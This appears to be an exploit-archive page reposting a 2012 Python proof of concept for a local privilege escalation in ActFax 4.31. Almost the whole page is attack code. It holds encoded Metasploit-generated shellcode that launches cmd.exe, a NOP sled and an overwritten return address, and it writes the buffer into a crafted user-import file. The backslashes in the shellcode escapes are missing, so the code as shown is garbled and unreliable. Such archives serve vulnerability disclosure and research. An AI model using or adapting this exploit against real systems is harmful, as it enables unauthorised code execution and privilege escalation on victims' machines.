Home / exploits ActFax 4.31 Local Privilege Escalation
Posted on 29 August 2012
#!/usr/bin/python #Title: ActFax 4.31 Local Privilege Escalation Exploit #Author: Craig Freyman (@cd1zz) #Discovered: July 10, 2012 #Vendor Notified: June 12, 2012 #Description: http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html #msfpayload windows/exec CMD=cmd.exe R | msfencode -e x86/alpha_upper -f c #[*] x86/alpha_upper succeeded with size 466 (iteration=1) sc = ( "x89xe5xdbxcexd9x75xf4x58x50x59x49x49x49x49" "x43x43x43x43x43x43x51x5ax56x54x58x33x30x56" "x58x34x41x50x30x41x33x48x48x30x41x30x30x41" "x42x41x41x42x54x41x41x51x32x41x42x32x42x42" "x30x42x42x58x50x38x41x43x4ax4ax49x4bx4cx5a" "x48x4dx59x45x50x35x50x53x30x43x50x4dx59x4a" "x45x56x51x48x52x55x34x4cx4bx36x32x50x30x4c" "x4bx36x32x44x4cx4cx4bx30x52x52x34x4cx4bx34" "x32x56x48x34x4fx38x37x51x5ax37x56x46x51x4b" "x4fx46x51x39x50x4ex4cx47x4cx35x31x43x4cx43" "x32x36x4cx31x30x49x51x48x4fx34x4dx55x51x58" "x47x4ax42x4cx30x30x52x50x57x4cx4bx50x52x52" "x30x4cx4bx37x32x47x4cx55x51x58x50x4cx4bx47" "x30x33x48x4bx35x39x50x34x34x50x4ax33x31x4e" "x30x30x50x4cx4bx57x38x52x38x4cx4bx36x38x51" "x30x33x31x4ex33x4bx53x57x4cx57x39x4cx4bx56" "x54x4cx4bx53x31x48x56x36x51x4bx4fx46x51x4f" "x30x4ex4cx49x51x58x4fx54x4dx55x51x39x57x50" "x38x4bx50x32x55x5ax54x53x33x43x4dx4bx48x47" "x4bx33x4dx46x44x53x45x5ax42x36x38x4cx4bx30" "x58x47x54x45x51x49x43x45x36x4cx4bx44x4cx30" "x4bx4cx4bx36x38x55x4cx53x31x59x43x4cx4bx54" "x44x4cx4bx55x51x48x50x4cx49x31x54x47x54x36" "x44x51x4bx31x4bx55x31x36x39x31x4ax36x31x4b" "x4fx4dx30x51x48x51x4fx50x5ax4cx4bx55x42x5a" "x4bx4dx56x31x4dx52x4ax45x51x4cx4dx4dx55x4f" "x49x45x50x53x30x53x30x46x30x42x48x36x51x4c" "x4bx52x4fx4dx57x4bx4fx39x45x4fx4bx4ax50x4e" "x55x39x32x31x46x55x38x59x36x4dx45x4fx4dx4d" "x4dx4bx4fx58x55x57x4cx35x56x53x4cx44x4ax4d" "x50x4bx4bx4dx30x52x55x55x55x4fx4bx37x37x35" "x43x52x52x32x4fx43x5ax43x30x56x33x4bx4fx4e" "x35x32x43x32x4dx45x34x46x4ex35x35x43x48x45" "x35x33x30x41x41") frontpad = "x90" * 10 eip = "x22x1bx40x00" #00401B22 RETN actfax.exe backpad = "x90" * 6000 buff = frontpad + sc + "x90" * (502 - len(sc)) + eip + backpad f = open("pwnag3.exp", "w") f.write( "User Name Entire User Name Password Alias-Names Group Direct Dialing Cost Account Permissions Comments User-Defined " "Predefined Settings Name 1 Name 2 Name 3 Name 4 Name 5 Department Attention of Phone 1 Phone 2 Fax Number E-Mail " "Coverpage Non-Windows Overlay Non-Windows Coverpage Windows Overlay Windows User-Defined Printer Settings Automatic Printing Outgoing " "Printer Name Outgoing Report Outgoing Automatic Printing Incoming Printer Name Incoming Report Incoming Notification Outgoing " "Email Outgoing Notification Incoming Email Incoming Attach Original Message User-Defined Archive Settings Export Outgoing " "Export Incoming Export-Path Mark as Readx0dx0a"+buff+"x0dx0a") f.close()
